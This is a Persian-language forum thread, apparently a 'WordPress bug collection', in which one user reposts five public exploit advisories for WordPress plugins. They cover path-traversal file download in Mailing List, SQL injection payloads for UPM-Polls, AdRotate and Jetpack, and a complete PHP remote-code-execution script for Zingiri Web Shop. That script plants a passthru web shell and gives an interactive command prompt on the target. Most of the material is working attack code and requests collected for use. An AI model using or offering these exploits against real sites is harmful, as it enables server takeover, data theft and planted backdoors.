•••کلکسیون باگ های وردپرس•••

siryahya

کاربر طلایی1

تاریخ عضویت : اسفند 1389

تعداد پست ها : 158652

محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

کد:

#Exploit Title: Mailing List plugin for Wordpress Arbitrary file download

#Version: < 1.4.2

#Date: 2011-12-19

#Author: 6Scan (http://6scan.com) security team

#Software Link: http://wordpress.org/extend/plugins/mailz/

#Official fix: This advisory is released after the vendor (http://www.zingiri.com) was contacted and fixed the issue promptly.

#Description : Unauthorized users can download arbitrary files from the server using this exploit.

# Vulnerable script includes config.php file, which connects to database with supplied credentials. Database entries are used to retrieve files from host.

# The bug is in config.php, but accessible from other file.

PoC

1) Setup mysql database

2) Create table with the next structure:

CREATE TABLE IF NOT EXISTS `phplist_attachment` (

`filename` varchar(1024) NOT NULL,

`mimetype` varchar(1024) NOT NULL,

`remotefile` varchar(1024) NOT NULL,

`description` varchar(1024) NOT NULL,

`size` int(11) NOT NULL,

`id` int(11) NOT NULL

) ENGINE=InnoDB DEFAULT CHARSET=latin1;

3) Add this raw into database:

INSERT INTO `phplist_attachment` (`filename`, `mimetype`, `remotefile`, `description`, `size`, `id`) VALUES

('../../../../../somefile.txt', '', '', '', 0, 0);

4) Call the script with database parameters and file id to download:

http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?wph=localhost&wpdb=test&user=root&wpp=root&id=0

The credentials are now saved in session, and there is no need to continue passing them:

http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=1

http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=2

http://192.168.0.1/wp-content/plugins/mailz/lists/dl.php?id=3

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394 8:14 AM

siryahya

کاربر طلایی1

تاریخ عضویت : اسفند 1389

تعداد پست ها : 158652

محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

کد:

# Exploit Title: BLIND SQL injection UPM-POLLS wordpress plugin 1.0.4

# Google Dork: n/a

# Date: 04-12-2011

# Author: Saif El-Sherei

# Software Link: http://downloads.wordpress.org/plugin/upm-polls.1.0.4.zip

# Version: 1.0.4

# Tested on: wordpress 3.2.1,Firefox 4, XAMPP

Info:

Best Plugin to create Polls for your site. Everything is smoother, faster,

and seamless like WordPress itself.

Poll Manager,

Ability to set general and post/page specific polls,

Ability to leaf over the polls

Ability to add certain poll in certain post content

Ability to show polls either with and without current results of

polls

Details:

the Variable PID is not properly sanitized in the get request before

insertion into the database query; allowing an attaacker or any user who

can view poll results (supposedly all user) to use blind sql injection to

extract database data and possibly compromise the whole server. a POC is

provided with both true and false results.

POC 1(TRUE):

1=1

"poll results for poll 2 is displayed"

POC 2 (FALSE):

1=2

"Blank page is displayed"

Time Line:

04-12-2011 Vulnerability discovered

04-12-2011 Vendor notified

11-12-2011 No response from vendor, public disclosure

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394 8:14 AM

siryahya

کاربر طلایی1

تاریخ عضویت : اسفند 1389

تعداد پست ها : 158652

محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

کد:

# Exploit Title: WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability

# Date: 2011-11-8

# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)

# Software Link: http://downloads.wordpress.org/plugin/adrotate.3.6.6.zip

# Version: 3.6.6 (tested)

# Note: parameter $_GET["track"] has to be Base64 encoded

---

PoC

---

e.g.

#!/bin/bash

payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"

encoded=`echo -n "1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#" | base64 -w 0`

curl http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=$encoded

---------------

Vulnerable code

---------------

if(isset($_GET['track']) OR $_GET['track'] != '') {

$meta = base64_decode($_GET['track']);

...

list($ad, $group, $block) = explode("-", $meta);

...

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394 8:14 AM

siryahya

کاربر طلایی1

تاریخ عضویت : اسفند 1389

تعداد پست ها : 158652

محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

کد:

<?php

------------------------------------------------------------------------

Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit

------------------------------------------------------------------------

author...............: Egidio Romano aka EgiX

mail.................: n0b0d13s[at]gmail[dot]com

software link........: http://wordpress.org/extend/plugins/zingiri-web-shop/

affected versions....: from 0.9.12 to 2.2.3

+-------------------------------------------------------------------------+

| This proof of concept code was written for educational purpose only. |

| Use it at your own risk. Author will be not responsible for any damage. |

+-------------------------------------------------------------------------+

[-] vulnerable code in /fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_save_name.php

37. @ob_start();

38. include_once(CLASS_SESSION_ACTION);

39. $sessionAction = new SessionAction();

40. $selectedDocuments = $sessionAction->get();

41. if(removeTrailingSlash($sessionAction->getFolder()) == getParentPath($_POST['id']) && sizeof($selectedDocuments))

42. {

43. if(($key = array_search(basename($_POST['id']), $selectedDocuments)) !== false)

44. {

45. $selectedDocuments[$key] = $_POST['value'];

46. $sessionAction->set($selectedDocuments);

47.

48. }

49. echo basename($_POST['id']) . "\n";

50. displayArray($selectedDocuments);

51.

52. }elseif(removeTrailingSlash($sessionAction->getFolder()) == removeTrailingSlash($_POST['id']))

53. {

54. $sessionAction->setFolder($_POST['id']);

55. }

56. writeInfo(ob_get_clean());

An attacker could be able to manipulate the $selectedDocuments array that will be displayed at line 50,

then at line 56 is called the 'writeInfo' function using the current buffer contents as argument.

Like my recently discovered vulnerability (http://www.exploit-db.com/exploits/18075/), this function

writes into a file called 'data.php' so an attacker could be able to execute arbitrary PHP code.

[-] Note:

The same vulnerability affects also the Joomla component (http://extensions.joomla.org/extensions/e-commerce/shopping-cart/13580)

but isn't exploitable due to a misconfiguration in 'CONFIG_SYS_ROOT_PATH' constant definition.

[-] Disclosure timeline:

[23/10/2011] - Vulnerability discovered

[25/10/2011] - Issue reported to http://forums.zingiri.com/

[12/11/2011] - Version 2.2.4 released

[13/11/2011] - Public disclosure

error_reporting(0);

set_time_limit(0);

ini_set("default_socket_timeout", 5);

$fileman = "wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager";

function http_send($host, $packet)

{

if (!($sock = fsockopen($host, 80)))

die( "\n[-] No response from {$host}:80\n");

fwrite($sock, $packet);

return stream_get_contents($sock);

}

function get_root_dir()

{

global $host, $path, $fileman;

$packet = "GET {$path}{$fileman}/ajaxfilemanager.php HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Connection: close\r\n\r\n";

if (!preg_match('/currentFolderPath" value="([^"]*)"/', http_send($host, $packet), $m)) die("\n[-] Root folder path not found!\n");

return $m[1];

}

function random_mkdir()

{

global $host, $path, $fileman, $rootdir;

$dirname = uniqid();

$payload = "new_folder={$dirname}&currentFolderPath={$rootdir}";

$packet = "POST {$path}{$fileman}/ajax_create_folder.php HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Content-Length: ".strlen($payload)."\r\n";

$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";

$packet .= "Connection: close\r\n\r\n{$payload}";

http_send($host, $packet);

return $dirname;

}

print "\n+----------------------------------------------------------------------------------+";

print "\n| Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit by EgiX |";

print "\n+----------------------------------------------------------------------------------+\n";

if ($argc < 3)

{

print "\nUsage......: php $argv[0] <host> <path>\n";

print "\nExample....: php $argv[0] localhost /";

print "\nExample....: php $argv[0] localhost /wordpress/\n";

die();

}

$host = $argv[1];

$path = $argv[2];

$rootdir = get_root_dir();

$phpcode = "<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";

$payload = "selectedDoc[]={$phpcode}&currentFolderPath={$rootdir}";

$packet = "POST {$path}{$fileman}/ajax_file_cut.php HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Content-Length: ".strlen($payload)."\r\n";

$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";

$packet .= "Connection: close\r\n\r\n{$payload}";

if (!preg_match("/Set-Cookie: ([^;]*);/", http_send($host, $packet), $sid)) die("\n[-] Session ID not found!\n");

$dirname = random_mkdir();

$newname = uniqid();

$payload = "value={$newname}&id={$rootdir}{$dirname}";

$packet = "POST {$path}{$fileman}/ajax_save_name.php HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Cookie: {$sid[1]}\r\n";

$packet .= "Content-Length: ".strlen($payload)."\r\n";

$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";

$packet .= "Connection: close\r\n\r\n{$payload}";

http_send($host, $packet);

$packet = "GET {$path}{$fileman}/inc/data.php HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Cmd: %s\r\n";

$packet .= "Connection: close\r\n\r\n";

while(1)

{

print "\nzingiri-shell# ";

if (($cmd = trim(fgets(STDIN))) == "exit") break;

preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?

print $m[1] : die("\n[-] Exploit failed!\n");

}

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394 8:14 AM

siryahya

کاربر طلایی1

تاریخ عضویت : اسفند 1389

تعداد پست ها : 158652

محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

کد:

######################################################

# Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability

# Date: 2011-19-11

# Author: longrifle0x

# software: Wordpress

# Download:http://wordpress.org/extend/plugins/jetpack/

# Tools: SQLMAP

######################################################

*DESCRIPTION

Discovered a vulnerability in jetpack, Wordpress Plugin,

vulnerability is SQL injection.

File:wp-content/plugins/jetpack/modules/sharedaddy.php

Exploit: id=-1; or 1=if

*Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php

[GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php

[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE use

r='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)

http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php

[GET][id=-1][MID((VERSION()),1,6)

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394 8:15 AM